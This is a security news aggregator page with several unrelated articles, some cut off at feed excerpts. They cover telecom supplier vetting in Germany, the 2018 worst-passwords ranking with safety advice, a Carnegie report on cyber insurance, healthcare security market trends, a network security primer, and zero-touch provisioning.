Channel: CodeSection, Code Zone, Network Security - CodeSec

German regulator to expand vetting of telecom equipment suppliers


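[TechWeb] December 20: According to foreign media reports, German regulators say they have urged global telecom suppliers interested in bidding on local infrastructure projects to submit their technology for official review, and that this is not limited to Huawei.

Germany's cybersecurity regulator, the Federal Office for Information Security, told foreign media that it is working with international suppliers to promote their participation in so-called technology verification programs, which include oversight of suppliers' headquarters, existing development and security facilities, or dedicated laboratories across Europe.

The office said that, given Bonn's position as Germany's national cybersecurity and telecommunications hub, it encourages all suppliers to open technology verification labs in Bonn, which it expects to be similar to the lab that Huawei opened in Bonn last month and that is already in operation.

These suppliers may include Ericsson and Nokia, Samsung Electronics, Cisco and others.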


The worst passwords of 2018 are out: see which one you use


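Password management company SplashData recently released its annual list of the worst passwords for the eighth time. Researchers analyzed more than 5 million passwords leaked on the internet and found that computer users are still using predictable, easily guessed passwords. Using these passwords carries a potential risk of account compromise and identity theft.

The analysis found that 123456 and password remain the first and second most commonly used weak passwords. donald, a password related to the name of US President Trump, appears in the weak-password list for the first time, in 23rd place.

The researchers say that users like easy-to-remember passwords such as the names of celebrities, stars and athletes or simple combinations of keyboard letters, and attackers use the same password lists to attack users' accounts. With several internet giants suffering user data leaks this year, the annual worst-password list is published in the hope that users will recognize the potential threat of weak passwords and be pushed to use strong password combinations to stay secure.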

2018 password ranking (top 25)

1. 123456 (unchanged)
2. password (unchanged)
3. 123456789 (↑ 3)
4. 12345678 (↓ 1)
5. 12345 (unchanged)
6. 111111 (new)
7. 1234567 (↑ 1)
8. sunshine (new)
9. qwerty (↓ 5)
10. iloveyou (unchanged)
11. princess (new)
12. admin (↓ 1)
13. welcome (↓ 1)
14. 666666 (new)
15. abc123 (unchanged)
16. football (↓ 7)
17. 123123 (unchanged)
18. monkey (↓ 5)
19. 654321 (new)
20. !@#$%^&* (new)
21. charlie (new)
22. aa123456 (new)
23. donald (new)
24. password1 (new)
25. qwerty123 (new)

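SplashData estimates that almost 10% of users have used at least one of these 25 weak passwords, and that 3% of users have used 123456, the weakest password.

The 5 million leaked passwords SplashData analyzed came mainly from users in North America and Western Europe; passwords leaked from adult websites were not included in the analysis.

SplashData offers the following advice to improve online security:

1. Use a password made of 12 or more letters, or one that combines multiple character types.

2. Use a different password on each platform, so that if a hacker obtains the password for one platform it cannot be used to log in to other sites.

3. Use a password manager to organize passwords, generate secure random passwords, and log in to websites automatically, protecting digital assets and personal identity.

For more SplashData data on weak passwords, see https://www.splashdata.com/worstpasswords.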

Carnegie report: insurance has a major role to play in solving the private sector's cybersecurity problems


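In November, the Carnegie Endowment for International Peace published a report titled Addressing the Private Sector Cybersecurity Predicament: The Indispensable Role of Insurance. The report notes that the cyber risks facing the private sector are growing more severe in scope, scale and complexity, while the available responses are very limited, and companies have begun turning to cyber insurance policies to meet the challenge. At present, however, cyber insurance offers only a limited, uncertain and temporary solution, even though the insurance industry should have great potential to reshape the risk landscape. The report analyzes the factors that keep the cybersecurity insurance market from functioning properly, examines the efforts of the insurance industry, governments, information and communications technology (ICT) suppliers and other major private-sector stakeholders to realize insurance's potential to reshape the risk environment, and finally discusses measures that could unlock the potential of cybersecurity insurance.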


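I. A complex and changing cyber risk environment

For a number of deep-seated reasons, governments and companies struggle to deal with cyber threats:

Commercial incentives: As companies introduce and extend connected functions, such as remote access to data, more network nodes create a larger attack surface. Under current economic incentives, suppliers of information and communications technology (ICT) products and services want to bring new technology to market quickly, and that speed often comes at the expense of security.

Technical constraints: Because of the complexity of ICT, testing and verifying the integrity and security of networked systems is inherently challenging. As these systems grow more complex and require frequent adjustment, closing vulnerabilities is exceptionally difficult.

Frequent demands from intelligence, military and law-enforcement operations: The volume and nature of human activity in cyberspace force governments to pay attention. Government agencies have begun to enter the field or seek to expand their footprint; they may try to take control, deploy more sophisticated tools to exploit vulnerabilities rather than reduce them, and even create new vulnerabilities.

The temptation for criminals, terrorists, hackers and other potentially malicious users: These groups can use, and have used, cyberspace to pursue their various goals, because the potential return on such activity is high while the chance of being caught and paying a heavy price is low.

Rapid proliferation of cyberattack tools: These include tools leaked or stolen from the cyber arsenals of technologically advanced countries, as well as tools produced by other entities through reverse engineering.

Growing likelihood of systemic and cascading effects from cyber incidents: This results from several interacting industry trends: widespread dependence on a limited number of common hardware and software platforms and services; market consolidation in key areas of the ICT industry; complex globalized supply chains; and the ever-expanding interconnection of systems and networks. With the rapid growth of the Internet of Things, these connections now reach deep into the physical world, including critical sectors such as manufacturing, industrial operations and aerospace, with wide-ranging knock-on effects.

Pervasive machine learning: Machine learning can help defenders in cybersecurity, but it can also benefit attackers, increasing the sophistication and efficiency of attacks.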

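II. Governments face multiple constraints

Strategic, political and structural factors limit governments' ability and willingness to reduce the private sector's exposure to cyberattack:

Limited "bandwidth": Governments naturally tend to address cybersecurity risks to their own networks and services first, then those to critical infrastructure and other potentially systemic and catastrophic risks; by comparison, the threats facing companies, civil society and individuals matter less.

Moral hazard: Governments worry that taking on significant responsibility for private-sector cyber risk would encourage these entities to become complacent and fail to take necessary precautions.

Conflicting strategies and competing priorities: Because cyber offense and defense involve an inherent balancing of interests, force and coordination, some government actions aggravate rather than ease the private sector's cybersecurity predicament. Sophisticated cyber tools are developed and used for law enforcement, intelligence and even warfare. In addition, all parties contending in cyberspace seek a suitable balance between meeting cybersecurity needs and offensive uses.

Prudence and restraint: Responding to foreign cyber espionage and warfare is fraught with risk and challenge for governments. Factors such as the difficulty of establishing attribution with sufficient certainty and in a form that can be made public hinder governments from responding to cyberattacks on the private sector.

Insufficient international cooperation: In cyberspace, sovereignty is blurred or contested, and political and legal obstacles make it hard to reach consensus on questions such as what constitutes unacceptable behavior in cyberspace. Unilaterally condemning improper cyber behavior also involves dilemmas, risks and trade-offs.

Private-sector pushback: Companies resist intrusive government regulation of, and other intervention in, their internal affairs, including the management of cyber risk. Part of the pushback stems from the private sector's long-standing concerns about regulation, such as implementation costs, liability arising from compliance, and the risk of disclosing their security posture to government or the public. Companies are also unwilling to respond to conflicting demands from different levels of government, let alone contradictory security regulations from governments in different regions.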

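III. The private sector is under multiple pressures

The private sector faces multiple cybersecurity-related challenges in its day-to-day operations:

Cybersecurity risks are numerous and quite complex: Cyber risk touches most business areas and activities. It not only creates new risks but also directly or indirectly affects corporate performance and liability. Effective cyber risk management faces conceptual, organizational, operational, technical, financial and managerial challenges; companies should assess cyber risk continuously and carry out a comprehensive strategy in response.

Cybersecurity investment consumes scarce corporate resources: Companies must spend profits on cybersecurity, yet this is still not enough to guard against major cyber risks. The question of whether to put limited resources into security technology and operations or into cyber resilience and risk-control measures makes the problem worse.

The limits of passive defense: Passive defense alone is not enough against increasingly sophisticated cyberattacks. Even when it succeeds, its effectiveness over time is uncertain, and passive defense cannot truly punish attackers.

Legal restrictions and bans on active cyber defense: In most jurisdictions, active cybersecurity measures remain contested conceptually and legally, or are prohibited outright in the private sector. In addition, most companies currently cannot bear the potential liability associated with deploying active defense measures.

Insufficient ability to transfer cyber risk to insurers: Although the insurance industry has traditionally played a key role in channeling risk, the private sector is currently not fully able to make use of cyber risk insurance.

Obstacles from commercial competition and government regulation: The uneven international regulatory environment makes companies particularly concerned about rules on cross-border data flows, antitrust measures and the like. The potential risks of sharing private data as part of security practice add to their anxiety. These factors hinder, and often completely prevent, pooling resources and sharing best practices, and they impede other forms of comprehensive joint response to evolving national and international cyber threats.

Low public tolerance for security breaches: People are more aware of risk and demand that companies do more to defend against it and disclose any incidents. Companies that fail to prepare for such situations face potential litigation.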

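IV. The key role of the cyber insurance industry

The key role of cyber insurance can be seen in six core functions of insurance:

Managing risk: By accumulating experience and analyzing data on effective risk-management practices, insurers can better understand the factors that shape the cyber risk environment.

Spreading corporate risk: Under customary insurance-industry standards, underwriters take on the core function of distributing companies' cyber risk.

Managing systemic risk: The process of identifying potential risk aggregation can not only avert catastrophic losses but also provide a valuable service to governments trying to anticipate and address possible systemic cyberattacks.

Using collective intelligence to improve security: Cyberspace is by nature interconnected yet made up of independent parts, which is both a formidable challenge and an opportunity, and calls for effective use of the whole ecosystem's strength. The insurance industry can become a central repository of security data across the private sector, using the data for analysis and to counter immediate threats.

Shaping a broader risk-prevention posture: Financial incentives offered by insurers can change private-sector behavior, and such change can have a strong and lasting effect on the cost-benefit calculus of malicious activity.

Harmonizing international standards and practices: Unlike national regulation, the insurance industry's influence crosses borders easily. Insurance can therefore act as a global proxy regulator, able to promote mutually beneficial practices and standards internationally.

The basic function of the insurance industry is to understand and manage risk, and its potential comes from near-real-time insight into risk. Top insurers are first of all risk-management experts. What the industry can do in cyber depends on data, and data collection lets it keep providing risk-management advice.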

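V. Why cyber risk insurance is hard

(1) Practical limits on how insurance products have evolved

The earliest cyber insurance policies emerged from the property sector: property insurers initially refused to insure intangible property such as "data", which created demand for coverage of such risks. Most insurers set up their cyber insurance business within their financial/management lines departments. Clients and brokers favor convenient transactions, and underwriting decisions are usually based on only the minimum information needed to support coverage. In today's constantly changing cyber risk environment, the danger posed by cyber threats goes beyond most commercial insurance, and the resulting losses can be claimed under several lines of coverage.

Many insurers currently lack the underwriting expertise or data-management systems to collect granular data effectively and build the robust datasets that underwriting requires. This challenge affects reinsurers as well as insurers. Because cyber risk has unprecedented cross-domain and cascading characteristics, there is not yet an "all-risk" cyber insurance policy that covers every potential loss.

Moreover, the insurance industry has rarely dealt with cyber-centric challenges, whose risks can change dramatically at any time. The distinctive nature of cyber risk makes it debatable whether it can satisfy the "principles of insurability". Two disruptive technologies, cloud services and machine learning introduced as an offensive and defensive measure, can make it harder for insurers to deal with risk exposure. Traditional approaches to coverage and rating will therefore no longer suit cyber risk, and observing and sharing leading best practices is the best way to make cyber risk manageable.

(2) The reality of customer distrust

To this day, the chief information security officers responsible for cybersecurity in companies remain skeptical of the insurance industry. They mistakenly believe that the core of the cyber underwriting process is collecting security vulnerabilities and pricing them, which could invite attacks or liability lawsuits, or even give insurers grounds to refuse coverage. In addition, risk-management departments and security leaders find it hard to cooperate effectively because of factors such as decision-making considerations, budgets and authority.

(3) The reality of disorderly competition in the insurance market

The cyber insurance market is fiercely competitive, which leads insurers to believe that the best way to win and keep business is to make underwriting as simple as possible, a situation made worse by brokers' pursuit of profit. In terms of talent development, unlike property insurance specialists, who hold recognized engineering credentials and experience, cyber underwriters are just beginning to test the waters, and the scarcity of security talent on the market means most potential cybersecurity professionals will not choose the insurance industry.

(4) Risk aggregation

These factors, together with the problems described earlier, lead to another important reality: insurers and reinsurers are struggling to understand the cyber-related risk aggregation created by the interconnection of platforms and shared service providers, including cloud computing. As noted above, several accelerating trends are increasing the likelihood of systemic and cascading consequences from cyber incidents. Predicting where and how risk may arise is very difficult, and this unpredictability compounds the already hard task insurers face in assessing the risk of any single policyholder. Fear of risk aggregation is the main driver of reinsurers' hesitation, and it in turn holds back the whole insurance market.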

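VI. How the cyber insurance industry can unlock its real potential

The ideal underwriting model is a dynamic database of risk-management best practices and failures. The optimal state for cyber insurance requires, first, participation by multiple parties; second, agreement between insurers and underwriters on a risk-management baseline and an industry best-practice baseline; third, financial and other incentives grounded in industry insight; and finally, timely revision. To unlock this potential, the report proposes the following practical measures to increase trust and transparency and so encourage more substantive sharing of information and data.

Hire cyber talent and cross-train: Brokers and insurers should be generous in pay and incentives for the right cybersecurity professionals. In addition, given that cyber risk cuts across product lines, brokers and insurers should both invest in cyber risk awareness training in every product area.

Specialized underwriting and deeper cooperation with cybersecurity service providers: Working with security researchers and managed security service providers can fill some of the gaps in the insurance industry's expertise and capability, and specific services (such as security audits, vulnerability assessments and penetration tests) can be integrated into the underwriting process. In addition, third-party expert assessment of policyholders' assets will give insurers a better understanding of risk exposure.

Increase claims transparency: Insurers should be as transparent as possible about accepted claims, payouts, reasons for denial and so on, while ensuring that no client-specific or confidential information is disclosed.

Make contracts simple and understandable: Insurers should strive to draft the simplest, most understandable insurance contracts. One of the biggest benefits of clear policies is that security leaders will understand them better and have confidence in how the insurance works.

Use maturity-based underwriting: Tools such as the Cybersecurity Capability Maturity Model (C2M2) and the US National Institute of Standards and Technology Cybersecurity Framework (NIST-CSF) can assess and support an organization's overall cyber risk management health and its willingness to keep improving, and this methodology suits the dynamic nature of cyber risk.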

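VII. Governments and the insurance industry working together will benefit both

Cooperation between government and industry should focus on reshaping the incentive structure that drives corporate behavior. The emphasis should be not merely on ad hoc cybersecurity fixes, but on comprehensively addressing, from the supply chain through to the end of the product life cycle, the factors that increase or reduce exposure to cyber risk.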


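(1) Making cyber risk exposure less attractive

Insurers can directly discourage risk-increasing behavior or encourage mitigation through premiums and exemption policies. More robust assessments of cyber risk should also be communicated to customers, consumers, shareholders and potential investors so as to create additional market incentives. Governments have a range of tools for directly regulating or indirectly promoting private-sector cybersecurity and risk-management practices, and thereby supporting insurers, including developing and issuing voluntary cyber risk management standards and exerting market power through their own procurement processes and contractual relationships. Governments already undertake many such activities, but often in an ad hoc way. Overall, market pressure may help offset the incentives that drive risk exposure. Further, cyber insurance can play a part within other mechanisms that encourage cybersecurity practices. Finally, cooperation is essential to addressing potential systemic cyber risk.

(2) Making cyber risk management more feasible

Beyond simply identifying effective risk-management practices, insurers can work with governments and cybersecurity providers to develop and promote innovative security practices. Through public-private partnerships, governments and the insurance industry can build cybersecurity capacity, improve the sharing of threat intelligence and best practices, explore innovative technologies and methods for more effective cyber defense, and set common cybersecurity standards and metrics. Insurers can give policyholders incentives to contract for cybersecurity services that meet formal or informal standards of professional practice. In turn, the development of common standards and metrics will give the insurance industry more effective benchmarks for cybersecurity practice.

(3) Ensuring the integrity of the ICT/ICS supply chain

ICT and ICS suppliers must take some responsibility for ensuring the integrity of their products throughout the life cycle. This requires suppliers to commit to certain obligations for their products, together with concrete measures and metrics that build broader trust in those commitments. Verifiable commitments and metrics for ICT/ICS product integrity would greatly ease insurers' concerns about whether they can adequately assess cyber risk and anticipate risk aggregation. In addition, close cooperation between these suppliers and insurers to implement such measures can give insurers concrete metrics for measuring risk exposure and mitigation.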

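VIII. Conclusion: building partnerships among government, the insurance industry and business

Government, business and the insurance industry can each begin to do their part in addressing cyber insurance. The insurance industry can take the practical steps above, improve dialogue between insurers and policyholders, and make underwriting more comprehensive, deeper and more transparent. Governments, working with other countries, can gradually raise cybersecurity expectations and requirements. Ongoing partnerships are needed among stakeholders and platforms. Disinterested parties such as the nonprofit sector can provide neutral platforms for reconciling the potentially divergent interests of stakeholders and communities. Ultimately, such partnerships are needed to address the root causes of cyber insecurity. Government and the insurance industry can do more than simply change risk-management practices; they can bring about a deeper shift in decision-making toward a more proactive, risk-centered framework. In turn, this change can avert risk aggregation effects, erode attackers' advantage in cyberspace, and help ease the pressure on governments to respond to escalating cyberattacks.

Original report: https://carnegieendowment.org/2018/11/07/addressing-private-sector-cybersecurity-predicament-indispensable-role-of-insurance-pub-77622

Compiled by He Jiaying (贺佳瀛)

Statement: This article comes from 赛博安全 (Cyber Security), and the copyright belongs to the author. The content represents only the author's independent views and not the position of 安全内参. It is reposted in order to share more information. To republish it, please contact the original author for authorization.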

Global healthcare IT security market: trends and opportunities


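Of all the attacks facing the healthcare industry, ransomware has recently become the most feared hacking technique. It lets attackers lock access to data and demand ransom from hospitals. Data from a recent study indicate that 88% of ransomware attacks target hospitals. Other data-breach risks in this industry come from poorly secured IoT devices and human error. With these factors, plus the requirements that HIPAA and other regulations place on the protection of health information, healthcare organizations have many significant security considerations to address promptly in order to ensure patient safety and privacy.

Healthcare organizations are putting in place a series of processes to maximize security effectiveness and maintain compliance, such as establishing a security program, emphasizing offline storage, protecting biomedical devices, educating users and training patients. This is because information security and patient privacy are key components of a well-run healthcare environment. In addition, the privacy and security area of the Healthcare Information and Management Systems Society (HIMSS) provides resources to help healthcare organizations meet their privacy and security goals.

Global healthcare IT security market: overview

The rise in major data breaches in healthcare highlights the urgent need for effective security measures in healthcare IT systems. Data breaches cost the healthcare industry dearly every year, and countries with more developed digital healthcare, such as the United States and several European countries, are hit hardest. As a result, the heavy financial pressure and negative impact that poor cybersecurity can impose on companies are receiving more attention, and the healthcare industry is substantially increasing its IT security spending.

TMR Research, a provider of custom market research and consulting services, has produced a global industry analysis and forecast report on the healthcare IT security market. It presents in detail the current growth dynamics of the global market and contains extensive forecasts of its growth prospects for 2016-2024. The report includes qualitative and quantitative analysis of the main market segments and their valuations, as well as expected growth rates over that period and the overall attractiveness of each regional market.

Global healthcare IT security market: trends and opportunities

The healthcare industry has gradually recognized that data breaches have been increasing in impact, frequency, scale and cost over the past few years. Moreover, today's cyberattacks are planned and executed quite professionally, so healthcare organizations' defenses must be equally proactive and prepared. The main driver of the global healthcare IT security market is precisely this need to assess the current state of security readiness and achieve a more effective security model.

In addition, the growing penetration of mobile devices in the internal networks of healthcare IT infrastructure, increasingly strict compliance requirements, and greater government spending on IT security are also driving the healthcare IT security market. The development of advanced IT security solutions for healthcare, and the growing adoption of affordable pay-per-use access to IT security solutions through cloud computing models, are likewise pushing the global market for healthcare IT security solutions forward.

Global healthcare IT security market: segmentation

The main products offered in the healthcare IT security market include risk and compliance management solutions, disaster recovery, firewalls and unified threat management solutions, antivirus software, intrusion detection/intrusion prevention systems, and identity and access management solutions. By service, the market can be segmented into upgrades, maintenance, implementation, managed services, consulting and ongoing support.

Healthcare IT security solutions are applied in endpoint security, content security and network security. By delivery model, the market can be further segmented into on-premises, cloud and hybrid deployment. The main end users of healthcare IT security solutions are insurers and healthcare providers.

Global healthcare IT security market: regional and competitive outlook

Geographically, developed regions such as Europe and North America are the main contributors to global healthcare IT security market revenue. The relatively extensive digital healthcare infrastructure in these regions has become a prime target for today's advanced cyberattacks, so security spending there is also rising quickly. These regions will remain the main contributors to the healthcare IT security market over the next few years.

The global healthcare IT security market is highly competitive and fragmented, with no single large vendor holding a dominant share. Leading companies in the market include Intel, SailPoint Technologies, Symantec, HP, AT&T, EMC, IBM, Wipro and Verizon.

The TMR Research report is available at:

https://www.tmrresearch.com/health-it-security-market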

Using ATT&CK As a Teacher


Over the past few years, I’ve had the pleasure of welcoming interns on our security research team. One of my goals was to pass on knowledge of security to these folks and pique their interest in (a career in) security. The goal of any teacher is to pass on their knowledge to the younger generation, in essence creating a miniature version of ourselves, which is hopefully somewhat better.

Let me take you back in time to 2015 when we had our first round of interns. I had the bright idea to go full-throttle. We loaded up Kali Linux, launched a Damn Vulnerable Web App instance, started scanning with OpenVAS and Nmap and then used Metasploit to attack everything we could. The problem with this was that these young interns had no experience in security. Their eyes were the size of saucers, and they walked around looking confused.

The next two years, I reeled it in a bit and started with essentially having them complete a book report on that year’s Verizon Data Breach Investigations Report. What I wanted them to understand was some of the key terms in security, how attackers work, what attackers are after and what defenses organizations are using to protect against these attacks.

Once this was complete, I kicked them out of the building. I had them run through a scenario of needing to gain access to an encrypted file on their computer back at their desk. Starting from the street corner, I had them provide a report of every security control they encountered on their way to the text in that encrypted file. These could be mitigating controls, such as door locks, security guards or passwords on the computer. They could also be deterring controls, such as video cameras. Nobody ever gets every (Read more...)

What is Network Security: An introduction to Network Security


We live in an age of information. Businesses these days are more digitally advanced than ever, and as technology improves, organizations’ security postures must be enhanced as well. Now, with many devices communicating with each other over wired, wireless, or cellular networks, network security is an important concept. In this article, we will explore what network security is and its key features.

Let’s take a look at the topics covered in this ‘What is Network Security?’ article:

What is network security?

What is network security attack?

Types of network security

Network security jobs

What is Network Security?

Network security is the process of taking preventative measures to protect the underlying networking infrastructure from unauthorized access, misuse, malfunction, modification, destruction or improper disclosure.

The Internet has undoubtedly become a huge part of our lives. Many people in today’s generation rely on the Internet for many of their professional, social and personal activities. But are you sure your network is secure?

There are many people who attempt to damage our Internet-connected computers, violate our privacy and make it impossible to use Internet services. Given the frequency and variety of existing attacks as well as the threat of new and more destructive future attacks, network security has become a central topic in the field of cybersecurity. Implementing network security measures allows computers, users and programs to perform their permitted critical functions within a secure environment.

Now that we know what network security is, let’s take a look at two major categories of network attacks.


What is network security attack?

A network attack can be defined as any method, process, or means used to maliciously attempt to compromise network security. Network security is the process of preventing network attacks across a given network infrastructure, but the techniques and methods used by the attacker further distinguish whether the attack is an active cyberattack, a passive type attack, or some combination of the two.

Let’s consider a simple network attack example to understand the difference between active and passive attack.

Active Attacks

An active attack is a network exploit in which an attacker attempts to make changes to data on the target or data en route to the target.



Meet Alice and Bob. Alice wants to communicate with Bob, but distance is a problem. So, Alice sends an electronic mail to Bob via a network which is not secure against attacks. There is another person, Tom, who is on the same network as Alice and Bob. Now, as the data flow is open to everyone on that network, Tom alters some portion of an authorized message to produce an unauthorized effect. For example, a message meaning “Allow BOB to read confidential file X” is modified as “Allow Smith to read confidential file X”.

Active network attacks are often aggressive, blatant attacks that victims immediately become aware of when they occur. Active attacks are highly malicious in nature, often locking out users, destroying memory or files, or forcefully gaining access to a targeted system or network.

Passive Attacks

A passive attack is a network attack in which a system is monitored and sometimes scanned for open ports and vulnerabilities, but which does not affect system resources.

Let’s consider the example we saw earlier:



Alice sends an electronic mail to Bob via a network which is not secure against attacks. Tom, who is on the same network as Alice and Bob, monitors the data transfer that is taking place between Alice and Bob. Suppose, Alice sends some sensitive information like bank account details to Bob as plain text. Tom can easily access the data and use the data for malicious purposes.

So, the purpose of the passive attack is to gain access to the computer system or network and to collect data without detection.

So, network security includes implementing different hardware and software techniques necessary to guard underlying network architecture. With the proper network security in place, you can detect emerging threats before they infiltrate your network and compromise your data.


Types of network security

There are many components to a network security system that work together to improve your security posture. The most common network security components are discussed below.

Access Control

To keep out potential attackers, you should be able to block unauthorized users and devices from accessing your network. Users that are permitted network access should only be able to work with the set of resources for which they’ve been authorized.

Application Security

Application security includes the hardware, software, and processes that can be used to track and lock down application vulnerabilities that attackers can use to infiltrate your network.

Firewalls

A firewall is a device or service that acts as a gatekeeper, deciding what enters and exits the network. It uses a set of defined rules to allow or block traffic. A firewall can be hardware, software, or both.

Virtual Private Networks (VPN)

A virtual private network encrypts the connection from an endpoint to a network, often over the Internet. This way it authenticates the communication between a device and a secure network, creating a secure, encrypted “tunnel” across the open internet.

Behavioral Analytics

You should know what normal network behavior looks like so that you can spot anomalies or network breaches as they happen. Behavioral analytics tools automatically identify activities that deviate from the norm.

Wireless Security

Wireless networks are not as secure as wired ones. Cybercriminals are increasingly targeting mobile devices and apps. So, you need to control which devices can access your network.

Intrusion Prevention System

These systems scan network traffic to identify and block attacks, often by correlating network activity signatures with databases of known attack techniques.

So, these are some ways of implementing network security. Apart from these, you’ll need a variety of software and hardware tools in your toolkit to ensure network security. These are:

Firewalls

Packet crafters

Web scanners

Packet sniffers

Intrusion detection system

Penetration testing software

Network security is essential for overall cybersecurity because the network is a significant line of defense against external attack. Given that virtually all data and applications are connected to the network, robust network security protects against data

South Yorkshire TravelMaster Selects Rambus To Deliver Innovative E-Commerce Tic ...

New retail portal, on-vehicle and NFC-based digital ticket delivery part of improved service offering

GLASGOW, Scotland & SHEFFIELD, England (BUSINESS WIRE) #DataFasterSafer

Rambus (NASDAQ: RMBS) today announced that TravelMaster, the commercial organisation responsible for delivering and managing multi-operator and integrated ticketing in South Yorkshire, has selected Rambus to deliver a multi-operator smart ticketing solution. The new, innovative smart ticketing system will allow TravelMaster customers to purchase ticketing products online and reap the benefits of smart ticketing whilst travelling across buses, trams and trains in South Yorkshire.

Rambus has extensive experience in delivering robust and scalable smart ticketing solutions which act as the backbone for deployments across the UK for bus, rail, subway and metro. Under this five-year agreement, Rambus will provide a HOPS with web retail and smart ticket collector app, to enable the secure delivery of digital smart tickets directly to tablets and mobile devices.

The solution will allow customers to purchase a range of flexible multi-operator tickets, valid on any bus, tram or train throughout South Yorkshire, online and in-advance through a retail portal on the TravelMaster website. These tickets can then be loaded onto a smart card via on-vehicle ticketing machines or through NFC-enabled and compatible smart phones.

“Our customers rightly expect to be able to purchase our great range of value for money products at their own convenience and this appointment is a major step towards TravelMaster meeting those expectations,” said Matt Smallwood, general manager of TravelMaster. “We’re one of the leading smart ticketing schemes in the UK and with the pedigree Rambus have in this field we will be able to deliver an innovative, accessible and enhanced way for our customers to purchase their products.”

TravelMaster’s e-Commerce system is a key part of the company’s retail strategy, which intends to support patronage growth, enhanced access to opportunities and economic development within the Sheffield City Region. By implementing commercially sustainable, customer-oriented, technologically innovative and integrated ways of selling and fulfilling products, TravelMaster and Rambus will together support a brighter future for South Yorkshire.

Russell McCullagh, vice president and general manager of Rambus Ticketing, commented: “For operators looking to provide a modern, frictionless transport experience that customers can rely on, smart mobile ticketing is the answer. We’re delighted to be working with TravelMaster and look forward to delivering a truly reliable ticketing experience for passengers which will create improved services and ticket access.”

TravelMaster intends to deploy the new e-Commerce system in the first half of 2019.

For more information on the TravelMaster system, visit http://sytravelmaster.com/.

Visit rambus.com/smart-ticketing for additional information on Rambus Smart Ticketing solutions.

Follow Rambus:

Company website: rambus.com

Rambus blog: rambus.com/blog

Twitter: @rambusinc

LinkedIn: www.linkedin.com/company/rambus

Facebook: www.facebook.com/RambusInc

About Rambus Security

Rambus Security is dedicated to providing a secure foundation for a connected world. Our innovative solutions span areas including tamper resistance, network security, mobile payment, smart ticketing and trusted transaction services. Rambus foundational technologies protect nearly nine billion licensed products annually, providing secure access to data and creating an economy of digital trust between our customers and their customer base. Additional information is available at

Zero-Touch Provisioning with Patrick Ogenstad (Part 2)


Last week we published the first half of the interview with Patrick Ogenstad, guest speaker in the Spring 2019 Building Network Automation Solutions online course (register here). Here’s the second half.

ZTP is about provisioning. Can this include configuration as well?

You could argue that provisioning is a form of configuration and in that sense, provisioning can certainly include configuration. Whether your ZTP solution is good at configuration management is another question.

I would say that the goal of the ZTP system should be to get the device in a state so that it can be handed over to the configuration management system. It might be that you use the same tool for everything. There are rather few tools out there, however, which are a master of all trades.

ZTP can be used internally connecting to an internal provisioning server, and it can be used externally connecting to an external provisioning server. Some commercial products use ZTP in connection with a vendor-controlled cloud-based provisioning server. What are the security risks if a vendor can push data to customer equipment?

Microsoft had a great article many years ago called Ten Immutable Laws of Security, in which one of those laws states that a computer is only as secure as the administrator is trustworthy. I'm not trying to say that the operators behind these solutions are untrustworthy, just that each organization has to take into account who they trust with what.

There will always be security risks involved regardless of what we do. The attack surface will be different against a service like this; on the other hand, it doesn't mean that it is worse than what most companies have today. A cloud-based service can be helpful to set up a new office where you don't have a network in place. However, as mentioned hereinabove, it still requires that the Internet connection uses DHCP, if we want to keep it as a ZTP install that is.

What tools are available to develop a ZTP solution?

If we are talking about creating a custom solution, there are a lot of open source tools that can serve as a base. DHCP will be needed, so ISC DHCP or Kea are good alternatives. For devices that support ZTP using a web server, Nginx could be helpful to serve files, but you can also write your web application using Flask or Django.

I would, however, recommend starting by stepping away from all of the tools and instead look at the process that you currently use to install devices. Not just getting the initial configuration on the box after it has powered up. Look at what steps need to get done for the new device to work as intended. That the device has the correct configuration is one thing, but it might also mean that it gets added to a network monitoring system. Start by writing all the steps that need to get done and then look at what tools can solve those problems.

Are there any standards yet?

While DHCP and TFTP have been around a long time as regards ZTP, there has as far as I know never been a standard discussion specifically about how to provision devices. However, looking into the future, there is an IETF draft called Zero Touch Provisioning for Network Devices (https://datatracker.ietf.org/doc/html/draft-ietf-netconf-zerotouch) that looks interesting. I wouldn't dare to guess as to when we might have devices that would support that concept.

How would you start and structure a ZTP project?

I would start by writing down all the manual steps needed to install a new device and integrate it into the network. Hopefully, I would have colleagues to talk to about this as I'm bound to miss some of the steps.

Then, I would look at each task and try to find a solution that could automate that step. If I couldn't get my hands on a tool for a specific part, I would write my own. I would start by trying to solve the easy problems first and be happy even if the ZTP solution would require a few manual steps to begin with and then work from there to improve it.

Want to know more? Patrick will talk about ZTP in the Spring 2019 Building Network Automation Solutions online course (register here). In the meantime, enjoy his ZTP tutorial.


The Rise and Fall of Enterprise Security Technology


Over the past few years “security” has become a buzzword across many industries, and for good reason. With the threat of data breaches haunting industry stalwarts, household brands and countless consumers, companies are paying more and more attention to their in-house security strategies.

To be smart about security, IT professionals need to think like a detective. We need to think like the “bad guys” to protect the “good guys,” and identify weaknesses before they are exposed.


However, more than 315 technology and security professionals surveyed in the 2018 Black Hat attendee survey revealed that when it comes to defending against cyberattacks, only three types of technologies were rated as “very effective” or “somewhat effective” by a majority of participants: encryption, multi-factor authentication tools and firewalls. The remaining technologies―including mobile security tools and data leak protection―were ranked “effective” by fewer than half the respondents. Passwords, perhaps the most universal of security technologies, were rated “effective” by only 19 percent of security professionals and “ineffective” by 37 percent.

Despite the broad availability of security technologies, there has been a rise and fall in the effectiveness of certain technologies, as the broader landscape shifts and hackers get smarter. Exploring the available security technology through the eyes of “on the ground” technology and security professionals better enables us to identify why the three leading tools earned their recognition as most effective―and how the industry is effecting that change.

The Modern IT Landscape

New technologies such as artificial intelligence (AI), machine learning and hybrid cloud have significantly influenced the effectiveness of security strategies that may have been successful just five years ago. While IT teams are eager to implement new technologies, they cannot allow their security practices to fall by the wayside―in lockstep with the introduction of next-generation technology, some security practices have become obsolete in turn.

Modern security strategies must remain fluid: Treating your security practices as an afterthought can be dire for an organization in the modern IT landscape.

However, many organizations may be unsure where to start when it comes to security processes, protocols and figuring out which technologies are best for their businesses. Smaller organizations specifically may not have a full-time security officer, but it is important to have a member of the IT team trained in security or a contractor who can assess the current status of the security practices and determine where the weakest links are. Once the assessment is complete, it should be clear which security strategies should be implemented. Following a companywide security audit, for example, you can decide if dual authentication is needed in the sales department or if encryption is needed in finance. Security plans are not one-and-done, they should evolve as you assess your business’ needs and the changing technology landscape.

The Tools of the Trade

While a strong security strategy is comprehensive, three technologies emerged as leading underlying protocols in 2018―encryption, multi-factor authentication and firewalls―and are crucial assets to any cybersecurity arsenal.

